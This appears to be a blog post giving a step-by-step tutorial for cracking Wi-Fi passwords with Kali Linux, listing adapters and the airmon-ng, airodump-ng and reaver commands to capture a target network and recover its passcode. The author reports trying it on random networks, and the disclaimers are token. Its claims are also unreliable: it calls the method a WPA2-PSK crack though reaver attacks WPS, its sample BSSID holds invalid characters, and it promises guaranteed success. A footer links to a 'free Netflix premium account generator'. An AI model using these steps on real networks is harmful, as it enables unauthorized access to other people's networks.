How To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux

How To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux

In this post we are going to show you How to hack secured wifi with WPA2-PSK using Kali Linux.
This hack may or may does not work on some Wifi network, We have personally tested this on some random Wifi networks and it works Fine for us.
Things You will need for Hacking WiFi –
1. Kali Linux OS
2. External Wi-Fi Adapter or Inbuilt Wi-Fi Device
3. Laptop/PC
HARDWARE
  • You need to have an external Wi-Fi adapter that is required to hack a Wi-Fi network. If you want to crack a password that has less security, then you can use plug-n-play wireless USB adapter TP-LINK TL-WN722N
  • If you need a better range with good quality wireless adapter, then it is recommended to use Alfa AWUSO36NH along with a better antenna.
  • If you wish to hack Wi-Fi network for Ultimate range Wi-Fi antenna then, you can use TP-LINK TL-ANT2424B 2.4GHz 24dBi .

How To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux

Warning..!! WiFi hacking is illegal.
“This post is only for educational purposes. I am not responsible for any consequences.”
So let’s Start Cracking.
Step 1: Open Terminal in Kali Linux. The first thing that you need to do is to find out the name of your of your wireless adapter, Just type ifconfig on the terminal and hit enter. Here in my case, wlan0 is my Wireless adapter.
Step 2: Now type airmon-ng check kill and hit enter and then type airmon-ng check and then hit enter

Step 3: Enable Monitor mode. Now, we are going to use a tool called airmon-ng to create a virtual interface called mon. Just type airmon-ng start wlan0 and hit enter.
Step 4: Now we have to start capturing packets and to do this we will use airodump-ng. Type airodump-ng wlan0mon and hit enter and after that, You’ll able to see the name of the wifi networks
Step 5: Suppose I want to hack the Wifi Bond_007 all I have to do is just copy the BSSID of the network. Just Select the BSSID and then Press Ctrl+C
Step 6: Now write the command reaver –i wlan0mon -b (BSSID that you had copied) -vv -K 1 and then Hit enter. Voila, You got the passcode.
e.g: reaver -i wlan0mon -b B0:5G:54:96:G7:70 -vv -K 1
How To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux
How To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux

All the advice/information that I gave was purely for educational purposes. I do not condone hacking a wireless network until and unless you are the owner of that network.
Source: Quora

Comments

Popular posts from this blog

Programmers discuss about the unethical and illegal things they have been asked to do

Top 10 Killer Tips to Improve Page Rank

Free Netflix premium account generator 2017